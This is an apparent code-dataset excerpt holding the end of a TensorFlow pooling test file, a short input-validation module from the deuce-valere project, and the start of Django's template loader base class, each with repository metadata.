expected_output = [73.0, 74.0, 75.0, 76.0, 77.0, 78.0, 79.0, 80.0, 89.0, 90.0, 91.0, 92.0, 93.0, 94.0, 95.0, 96.0, 105.0, 106.0, 107.0, 108.0, 109.0, 110.0, 111.0, 112.0, 117.0, 118.0, 119.0, 120.0, 121.0, 122.0, 123.0, 124.0, 201.0, 202.0, 203.0, 204.0, 205.0, 206.0, 207.0, 208.0, 217.0, 218.0, 219.0, 220.0, 221.0, 222.0, 223.0, 224.0, 233.0, 234.0, 235.0, 236.0, 237.0, 238.0, 239.0, 240.0, 245.0, 246.0, 247.0, 248.0, 249.0, 250.0, 251.0, 252.0, 329.0, 330.0, 331.0, 332.0, 333.0, 334.0, 335.0, 336.0, 345.0, 346.0, 347.0, 348.0, 349.0, 350.0, 351.0, 352.0, 361.0, 362.0, 363.0, 364.0, 365.0, 366.0, 367.0, 368.0, 373.0, 374.0, 375.0, 376.0, 377.0, 378.0, 379.0, 380.0, 425.0, 426.0, 427.0, 428.0, 429.0, 430.0, 431.0, 432.0, 441.0, 442.0, 443.0, 444.0, 445.0, 446.0, 447.0, 448.0, 457.0, 458.0, 459.0, 460.0, 461.0, 462.0, 463.0, 464.0, 469.0, 470.0, 471.0, 472.0, 473.0, 474.0, 475.0, 476.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 8, 8, 8], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def testAvgPooling(self): for use_gpu in True, False: self._testAvgPoolValidPadding(use_gpu) self._testAvgPoolSamePadding(use_gpu) self._testAvgPoolSamePaddingNonSquareWindow(use_gpu) self._testAvgPoolSamePaddingNonSquareWindowMultiBatch(use_gpu) self._testAvgPoolValidPaddingUnevenStride(use_gpu) self._testAvgPoolSamePadding4(use_gpu) self._testAvgPoolSamePaddingPacket4(use_gpu) self._testAvgPoolSamePaddingPacket8(use_gpu) def _testMaxPoolValidPadding(self, use_gpu): expected_output = [13.0, 14.0, 15.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePadding(self, use_gpu): expected_output = [13.0, 14.0, 15.0, 16.0, 17.0, 18.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePaddingNonSquareWindow(self, use_gpu): # input is: # [1.0, 2.0 # 3.0 4.0] # # Window of [x, x] should do: # # [max(1.0, 2.0), max(2.0, padded0), # max(3.0, 4.0), max(4.0, padded0)] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 2.0, 4.0, 4.0], use_gpu=use_gpu) def _testMaxPoolValidPaddingUnevenStride(self, use_gpu): self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 1], ksize=[1, 2, 2, 1], strides=[1, 1, 2, 1], padding="VALID", expected=[6.0, 8.0, 10.0, 12.0, 14.0, 16.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 1], ksize=[1, 2, 2, 1], strides=[1, 2, 1, 1], padding="VALID", expected=[6.0, 7.0, 8.0, 14.0, 15.0, 16.0], use_gpu=use_gpu) def _testMaxPoolSamePaddingPacket4(self, use_gpu): expected_output = [21.0, 22.0, 23.0, 24.0, 29.0, 30.0, 31.0, 32.0, 53.0, 54.0, 55.0, 56.0, 61.0, 62.0, 63.0, 64.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePaddingPacket8(self, use_gpu): expected_output = [145.0, 146.0, 147.0, 148.0, 149.0, 150.0, 151.0, 152.0, 161.0, 162.0, 163.0, 164.0, 165.0, 166.0, 167.0, 168.0, 177.0, 178.0, 179.0, 180.0, 181.0, 182.0, 183.0, 184.0, 185.0, 186.0, 187.0, 188.0, 189.0, 190.0, 191.0, 192.0, 273.0, 274.0, 275.0, 276.0, 277.0, 278.0, 279.0, 280.0, 289.0, 290.0, 291.0, 292.0, 293.0, 294.0, 295.0, 296.0, 305.0, 306.0, 307.0, 308.0, 309.0, 310.0, 311.0, 312.0, 313.0, 314.0, 315.0, 316.0, 317.0, 318.0, 319.0, 320.0, 401.0, 402.0, 403.0, 404.0, 405.0, 406.0, 407.0, 408.0, 417.0, 418.0, 419.0, 420.0, 421.0, 422.0, 423.0, 424.0, 433.0, 434.0, 435.0, 436.0, 437.0, 438.0, 439.0, 440.0, 441.0, 442.0, 443.0, 444.0, 445.0, 446.0, 447.0, 448.0, 465.0, 466.0, 467.0, 468.0, 469.0, 470.0, 471.0, 472.0, 481.0, 482.0, 483.0, 484.0, 485.0, 486.0, 487.0, 488.0, 497.0, 498.0, 499.0, 500.0, 501.0, 502.0, 503.0, 504.0, 505.0, 506.0, 507.0, 508.0, 509.0, 510.0, 511.0, 512.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 8, 8, 8], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def testMaxPooling(self): for use_gpu in True, False: self._testMaxPoolValidPadding(use_gpu) self._testMaxPoolSamePadding(use_gpu) self._testMaxPoolSamePaddingNonSquareWindow(use_gpu) self._testMaxPoolValidPaddingUnevenStride(use_gpu) self._testMaxPoolSamePaddingPacket4(use_gpu) self._testMaxPoolSamePaddingPacket8(use_gpu) # Tests for DepthwiseMaxPooling on CPU only. def testDepthwiseMaxPool1x1DepthWindow1(self): # input is: # [1.0, ..., 10.0] along depth, # # We maxpool by depth in patches of 2. self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 1, 1, 10], ksize=[1, 1, 1, 2], strides=[1, 1, 1, 2], padding="SAME", expected=[2.0, 4.0, 6.0, 8.0, 10.0], use_gpu=False) def testDepthwiseMaxPool2x2DepthWindow3(self): # input is: # # a 2x2x6 cube, and we depthwise max across 3 to produce a 2x2x2 # output. Each node has contiguous values, so the depthwise max # should be multiples of 3.0. self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 2, 6], ksize=[1, 1, 1, 3], strides=[1, 1, 1, 3], padding="SAME", expected=[3.0, 6.0, 9.0, 12.0, 15.0, 18.0, 21.0, 24.0], use_gpu=False) def _testDepthwiseMaxPoolInvalidConfig(self, in_size, ksize, strides, error_msg, use_gpu=False): t = tf.constant(1.0, shape=in_size) with self.assertRaisesRegexp(ValueError, error_msg): t = tf.nn.max_pool(t, ksize=ksize, strides=strides, padding="SAME") def testDepthwiseMaxPoolInvalidConfigs(self): self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 2, 2, 2], [1, 1, 1, 2], "exactly one of pooling across depth") self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 1, 1, 2], [1, 1, 1, 1], "depth window to equal the depth stride") self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 1, 1, 3], [1, 1, 1, 3], "evenly divide") if tf.test.IsBuiltWithCuda(): with self.test_session(use_gpu=True): t = tf.constant(1.0, shape=[1, 2, 2, 4]) with self.assertRaisesOpError("for CPU devices"): tf.nn.max_pool(t, ksize=[1, 1, 1, 2], strides=[1, 1, 1, 2], padding="SAME").eval() # The following are tests that verify that the CPU and GPU implementations # produce the same resuts. def _CompareMaxPoolingFwd(self, input_shape, ksize, strides, padding): tensor_input = np.random.rand(*input_shape).astype(np.float32) with self.test_session(use_gpu=True): t = tf.constant(tensor_input, shape=input_shape) out_op, _ = tf.nn.max_pool_with_argmax(t, ksize, strides, padding) gpu_val = out_op.eval() with self.test_session(use_gpu=False): t = tf.constant(tensor_input, shape=input_shape) out_op = tf.nn.max_pool(t, ksize, strides, padding) cpu_val = out_op.eval() self.assertAllClose(cpu_val, gpu_val, rtol=1e-5, atol=1e-5) def _CompareMaxPoolingBk(self, input_shape, output_shape, ksize, strides, padding): # Generate numbers in a narrow range, so that there are many duplicates # in the input. tensor_input = np.random.random_integers(0, 3, input_shape).astype(np.float32) tensor_output = np.random.rand(*output_shape).astype(np.float32) with self.test_session(use_gpu=True): t = tf.constant(tensor_input, shape=input_shape) _, argmax_op = tf.nn.max_pool_with_argmax(t, ksize, strides, padding) argmax = argmax_op.eval() grad_in = tf.constant(tensor_output, shape=output_shape) out_op = gen_nn_ops._max_pool_grad_with_argmax(t, grad_in, argmax, ksize, strides, padding) gpu_val = out_op.eval() self.assertShapeEqual(gpu_val, out_op) with self.test_session(use_gpu=False): t = tf.constant(tensor_input, shape=input_shape) out_op = tf.nn.max_pool(t, ksize, strides, padding) orig_out = out_op.eval() grad_in = tf.constant(tensor_output, shape=output_shape) out_op = gen_nn_ops._max_pool_grad(t, orig_out, grad_in, ksize, strides, padding) cpu_val = out_op.eval() self.assertShapeEqual(cpu_val, out_op) self.assertAllClose(cpu_val, gpu_val, rtol=1e-5, atol=1e-5) def testMaxPoolingWithArgmax(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return tensor_input = [1.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0] with self.test_session(use_gpu=True) as sess: t = tf.constant(tensor_input, shape=[1, 3, 3, 1]) out_op, argmax_op = tf.nn.max_pool_with_argmax(t, ksize=[1, 2, 2, 1], strides=[1, 1, 1, 1], Targmax=tf.int64, padding="VALID") out, argmax = sess.run([out_op, argmax_op]) self.assertShapeEqual(out, out_op) self.assertShapeEqual(argmax, argmax_op) self.assertAllClose(out.ravel(), [1.0, 1.0, 1.0, 1.0]) self.assertAllEqual(argmax.ravel(), [0, 1, 3, 5]) def testMaxPoolingGradWithArgmax(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return orig_input = [1.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0] tensor_input = [11.0, 12.0, 13.0, 14.0] tensor_argmax = list(np.array([0, 1, 3, 5], dtype=np.int64)) with self.test_session(use_gpu=True) as sess: orig_in = tf.constant(orig_input, shape=[1, 3, 3, 1]) t = tf.constant(tensor_input, shape=[1, 2, 2, 1]) argmax = tf.constant(tensor_argmax, shape=[1, 2, 2, 1], dtype=tf.int64) out_op = gen_nn_ops._max_pool_grad_with_argmax(orig_in, t, argmax, ksize=[1, 2, 2, 1], strides=[1, 1, 1, 1], padding="VALID") out = out_op.eval().flatten() self.assertAllClose(out, [11.0, 12.0, 0.0, 13.0, 0.0, 14.0, 0.0, 0.0, 0.0]) def _ConstructAndTestGradient(self, pool_func, input_sizes, output_sizes, window_rows, window_cols, row_stride, col_stride, padding, use_gpu, x_init_value=None): """Verifies the gradients of the avg pooling function. Args: pool_func: Function to be called, co.MaxPool, co.AvgPool, or the Lua version. input_sizes: Input tensor dimensions. output_sizes: Output tensor dimensions. window_rows: kernel size in row dim window_cols: kernel size in col dim row_stride: Row Stride. col_stride: Col Stride. padding: Padding type. use_gpu: whether we are running on GPU x_init_value: Values to be passed to the gradient checker. """ total_size = 1 for s in input_sizes: total_size *= s # Initializes the input tensor with array containing incrementing # numbers from 1. x = [f * 1.0 for f in range(1, total_size + 1)] with self.test_session(use_gpu=use_gpu): input_tensor = tf.constant(x, shape=input_sizes, name="input") if pool_func == tf.nn.avg_pool: func_name = "avg_pool" err_margin = 1e-4 else: if x_init_value is None: x_init_value = np.asfarray( np.arange(1, total_size + 1), dtype=np.float32).reshape(input_sizes) func_name = "max_pool" err_margin = 1e-3 t = pool_func(input_tensor, ksize=[1, window_rows, window_rows, 1], strides=[1, row_stride, col_stride, 1], padding=padding, name=func_name) err = gc.ComputeGradientError( input_tensor, input_sizes, t, output_sizes, x_init_value=x_init_value, delta=1e-2) print("%s gradient error = " % func_name, err) self.assertLess(err, err_margin) def _testMaxPoolGradValidPadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[1, 3, 3, 1], output_sizes=[1, 3, 3, 1], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_1_6(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 6, 6, 3], output_sizes=[2, 5, 5, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_1_7(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 7, 7, 3], output_sizes=[2, 6, 6, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 2, 3], output_sizes=[2, 1, 1, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradSamePadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 1, 2, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding3_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[1, 7, 7, 1], output_sizes=[1, 7, 7, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def testMaxPoolGrad(self): for use_gpu in True, False: self._testMaxPoolGradValidPadding1_1(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_1_6(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_1_7(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_2(use_gpu=use_gpu) self._testMaxPoolGradSamePadding1_1(use_gpu=use_gpu) self._testMaxPoolGradSamePadding2_1(use_gpu=use_gpu) self._testMaxPoolGradSamePadding2_2(use_gpu=use_gpu) self._testMaxPoolGradSamePadding3_1(use_gpu=use_gpu) def _MaxPoolGrad(self, orig_input, orig_output, grad, window_rows, window_cols, row_stride, col_stride, padding): """Max Pooling Gradient. Args: orig_input: A float Tensor. The original input tensor. orig_output: A float Tensor. The original output tensor. grad: A float Tensor. The 4D (batch x rows x cols x depth) output backprop. window_rows: integer. Kernel size along rows dimension. window_cols: integer. Kernel size along cols dimension. row_stride: integer. Stride along rows dimension col_stride: integer. Stride along cols dimension padding: PoolingOpDef.Padding. Padding type. Returns: A Tensor. """ return gen_nn_ops._max_pool_grad( orig_input, orig_output, grad, [1, window_rows, window_cols, 1], [1, row_stride, col_stride, 1], padding) def _testMaxPoolGradDirect(self, input_data, output_backprop, expected_input_backprop, input_sizes, output_sizes, window_rows, window_cols, row_stride, col_stride, padding, use_gpu): with self.test_session(use_gpu=use_gpu) as sess: input_tensor = tf.constant(input_data, shape=input_sizes) output_tensor = tf.nn.max_pool( input_tensor, [1, window_rows, window_cols, 1], [1, row_stride, col_stride, 1], padding) output_backprop_tensor = tf.constant(output_backprop, shape=output_sizes) input_backprop_tensor = self._MaxPoolGrad( input_tensor, output_tensor, output_backprop_tensor, window_rows, window_cols, row_stride, col_stride, padding) actual_input_backprop = input_backprop_tensor.eval() self.assertShapeEqual(actual_input_backprop, input_backprop_tensor) actual_input_backprop = actual_input_backprop.flatten() actual_input_backprop = self._GetNdArray(actual_input_backprop) actual_output = output_tensor.eval().flatten() actual_output = self._GetNdArray(actual_output) self.assertAllClose(expected_input_backprop, actual_input_backprop, rtol=1e-6, atol=1e-6) def _testMaxPoolGradDirect1_1(self): input_data = [ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] expected_input_backprop = [ 11.0, 12.0, 13.0, 0.0, 15.0, 16.0, 17.0, 0.0, 19.0, 20.0, 21.0, 0.0, 0.0, 0.0, 0.0, 0.0] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradDirect1_2(self): input_data = [ 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0] output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] expected_input_backprop = [ 11.0, 0.0, 25.0, 0.0, 0.0, 31.0, 0.0, 17.0, 19.0, 0.0, 41.0, 0.0, 0.0, 0.0, 0.0, 0.0] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradDirect1_3(self): input_data = [ 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0,] output_backprop = [ 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0] expected_input_backprop = [ 54, 0.0, 62, 0.0, 0.0, 60, 0.0, 22.0, 47, 0.0, 51, 0.0, 0.0, 0.0, 0.0, 0.0,] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 4, 4, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradDirectWithNans2_1(self): input_data = [float("nan")] * 16 output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] # Test the CPU implementation, which propagates diffs in case of NaN expected_input_backprop_tf_cpu = [ 11.0, 12.0, 13.0, 0.0, 15.0, 16.0, 17.0, 0.0, 19.0, 20.0, 21.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_tf_cpu, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=False) if not tf.test.IsBuiltWithCuda(): return # Test the GPU implementation that uses cudnn for now. # It does not propagate the diff in cases of NaNs expected_input_backprop_cudnn = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_cudnn, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=True) def _testMaxPoolGradDirectWithNans2_2(self): input_data = [float("nan")] * 16 output_backprop = [ float("nan"), 12.0, 13.0, 15.0, float("nan"), 17.0, 19.0, 20.0, float("nan")] # Test the CPU implementation, which propagates diffs in case of NaN expected_input_backprop_tf_cpu = [ float("nan"), 12.0, 13.0, 0.0, 15.0, float("nan"), 17.0, 0.0, 19.0, 20.0, float("nan"), 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_tf_cpu, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=False) if not tf.test.IsBuiltWithCuda(): return # Test the GPU implementation that uses cudnn for now. # It does not propagate the diff in cases of NaNs expected_input_backprop_cudnn = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_cudnn, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=True) def testMaxPoolGradDirect(self): self._testMaxPoolGradDirect1_1() self._testMaxPoolGradDirect1_2() self._testMaxPoolGradDirect1_3() self._testMaxPoolGradDirectWithNans2_1() self._testMaxPoolGradDirectWithNans2_2() def testAvgPoolGrad(self): for use_gpu in False, True: self._testAvgPoolGradValidPadding1_1(use_gpu) self._testAvgPoolGradValidPadding2_1(use_gpu) self._testAvgPoolGradValidPadding2_2(use_gpu) self._testAvgPoolGradSamePadding1_1(use_gpu) self._testAvgPoolGradSamePadding2_1(use_gpu) self._testAvgPoolGradSamePadding2_2(use_gpu) self._testAvgPoolGradSamePadding3_1(use_gpu) def _testAvgPoolGradValidPadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 3, 3, 3], output_sizes=[2, 3, 3, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradValidPadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 3, 3, 3], output_sizes=[2, 2, 2, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradValidPadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 2, 3], output_sizes=[2, 1, 1, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradSamePadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testAvgPoolGradSamePadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testAvgPoolGradSamePadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 1, 2, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="SAME", use_gpu=use_gpu) def _testAvgPoolGradSamePadding3_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[1, 7, 7, 1], output_sizes=[1, 7, 7, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def testShapeFunctionEdgeCases(self): # All shapes unknown. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool]: p = tf.nn.max_pool(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") self.assertEqual([None, None, None, None], p.get_shape().as_list()) p, am = tf.nn.max_pool_with_argmax( tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") self.assertEqual([None, None, None, None], p.get_shape().as_list()) self.assertEqual([None, None, None, None], am.get_shape().as_list()) # Incorrect input shape. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaises(ValueError): pool_func(tf.placeholder(tf.float32, shape=[1, 3]), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") # Illegal strides. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp(ValueError, "strides in the batch"): pool_func(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[2, 1, 1, 1], padding="SAME") with self.assertRaisesRegexp(ValueError, "strides in the batch and depth"): tf.nn.avg_pool(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 2], padding="SAME") # Filter larger than input. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp(ValueError, "filter must not be larger than the input"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 20, 21, 1], strides=[1, 1, 1, 1], padding="SAME") with self.assertRaisesRegexp(ValueError, "filter must not be larger than the input"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 21, 20, 1], strides=[1, 1, 1, 1], padding="SAME") # Stride larger than filter. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp( ValueError, "stride must be less than or equal to filter"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 5, 3, 1], strides=[1, 5, 5, 1], padding="SAME") with self.assertRaisesRegexp( ValueError, "stride must be less than or equal to filter"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 3, 5, 1], strides=[1, 5, 5, 1], padding="SAME") def GetMaxPoolFwdTest(input_size, filter_size, strides, padding): def Test(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return self._CompareMaxPoolingFwd(input_size, filter_size, strides, padding) return Test def GetMaxPoolGradTest(input_size, filter_size, output_size, strides, padding): def Test(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return self._CompareMaxPoolingBk(input_size, output_size, filter_size, strides, padding) return Test if __name__ == "__main__": for (name_, input_size_, filter_size_, output_size_, stride_, padding_) in GetInceptionMaxPoolShapes(): setattr(PoolingTest, "testMaxPoolFwd_" + name_, GetMaxPoolFwdTest(input_size_, filter_size_, stride_, padding_)) setattr(PoolingTest, "testMaxPoolGrad_" + name_, GetMaxPoolGradTest(input_size_, filter_size_, output_size_, stride_, padding_)) tf.test.main()
apache-2.0
rackerlabs/deuce-valere
deucevalere/common/validation.py
1
1337
""" Deuce Valere - Common - Validation """ import datetime from deuceclient.api import * from deuceclient.auth.base import AuthenticationBase from deuceclient.client.deuce import DeuceClient from deuceclient.common.validation import * from deuceclient.common.validation_instance import * from stoplight import Rule, ValidationFailed, validation_function @validation_function def val_authenticator_instance(value): if not isinstance(value, AuthenticationBase): raise ValidationFailed('authenticator must be derived from ' 'deuceclient.auth.base.AuthenticationBase') @validation_function def val_deuceclient_instance(value): if not isinstance(value, DeuceClient): raise ValidationFailed('invalid Deuce Client instance') @validation_function def val_expire_age(value): if not isinstance(value, datetime.timedelta): raise ValidationFailed('must be type datetime.timedelta') def _abort(error_code): abort_errors = { 100: TypeError } raise abort_errors[error_code] AuthEngineRule = Rule(val_authenticator_instance(), lambda: _abort(100)) ClientRule = Rule(val_deuceclient_instance(), lambda: _abort(100)) ExpireAgeRule = Rule(val_expire_age(), lambda: _abort(100)) ExpireAgeRuleNoneOkay = Rule(val_expire_age(none_ok=True), lambda: _abort(100))
apache-2.0
KokareIITP/django
django/template/loaders/base.py
137
3887
import warnings from django.template import Origin, Template, TemplateDoesNotExist from django.utils.deprecation import RemovedInDjango20Warning from django.utils.inspect import func_supports_parameter class Loader(object): # Only used to raise a deprecation warning. Remove in Django 1.10. is_usable = False _accepts_engine_in_init = True def __init__(self, engine): self.engine = engine def __call__(self, template_name, template_dirs=None): # RemovedInDjango20Warning: Allow loaders to be called like functions. return self.load_template(template_name, template_dirs) def get_template(self, template_name, template_dirs=None, skip=None): """ Calls self.get_template_sources() and returns a Template object for the first template matching template_name. If skip is provided, template origins in skip are ignored. This is used to avoid recursion during template extending. """ tried = [] args = [template_name] # RemovedInDjango20Warning: Add template_dirs for compatibility with # old loaders if func_supports_parameter(self.get_template_sources, 'template_dirs'): args.append(template_dirs) for origin in self.get_template_sources(*args): if skip is not None and origin in skip: tried.append((origin, 'Skipped')) continue try: contents = self.get_contents(origin) except TemplateDoesNotExist: tried.append((origin, 'Source does not exist')) continue else: return Template( contents, origin, origin.template_name, self.engine, ) raise TemplateDoesNotExist(template_name, tried=tried) def load_template(self, template_name, template_dirs=None): warnings.warn( 'The load_template() method is deprecated. Use get_template() ' 'instead.', RemovedInDjango20Warning, ) source, display_name = self.load_template_source( template_name, template_dirs, ) origin = Origin( name=display_name, template_name=template_name, loader=self, ) try: template = Template(source, origin, template_name, self.engine) except TemplateDoesNotExist: # If compiling the template we found raises TemplateDoesNotExist, # back off to returning the source and display name for the # template we were asked to load. This allows for correct # identification of the actual template that does not exist. return source, display_name else: return template, None def get_template_sources(self, template_name): """ An iterator that yields possible matching template paths for a template name. """ raise NotImplementedError( 'subclasses of Loader must provide a get_template_sources() method' ) def load_template_source(self, template_name, template_dirs=None): """ RemovedInDjango20Warning: Returns a tuple containing the source and origin for the given template name. """ 